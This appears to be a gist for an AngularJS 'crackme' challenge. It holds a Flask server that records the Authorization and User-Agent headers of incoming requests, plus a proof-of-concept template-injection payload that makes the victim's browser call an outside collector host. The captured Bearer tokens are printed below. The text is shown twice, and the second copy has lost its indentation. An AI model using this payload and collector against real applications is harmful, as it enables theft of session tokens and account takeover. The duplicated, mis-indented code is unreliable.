/angularjs-crackme.py Secret

## angularjs-crackme.py
from flask import Flask
from flask.ext.cors import CORS
from flask import request
import json

app = Flask(__name__)
CORS(app)

h = ['test']

@app.route("/")
def helloWorld():
    global h
    h.append((request.headers.get('Authorization'),request.headers.get('User-Agent')))
    return "Hello!"

@app.route("/headers")
def headers():
    global h
    return json.dumps(h)


if __name__ == '__main__':
    app.run()


# PoC AngularJS payload
# {[{todos.oneUrl('xx','http://<OPENSHIFT-URL>/').get()}]}
#
# Captured
# ["test", ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"]]
	from flask import Flask
	from flask.ext.cors import CORS
	from flask import request
	import json

	app = Flask(__name__)
	CORS(app)

	h = ['test']

	@app.route("/")
	def helloWorld():
	global h
	h.append((request.headers.get('Authorization'),request.headers.get('User-Agent')))
	return "Hello!"

	@app.route("/headers")
	def headers():
	global h
	return json.dumps(h)


	if __name__ == '__main__':
	app.run()


	# PoC AngularJS payload
	# {[{todos.oneUrl('xx','http://<OPENSHIFT-URL>/').get()}]}
	#
	# Captured
	# ["test", ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"]]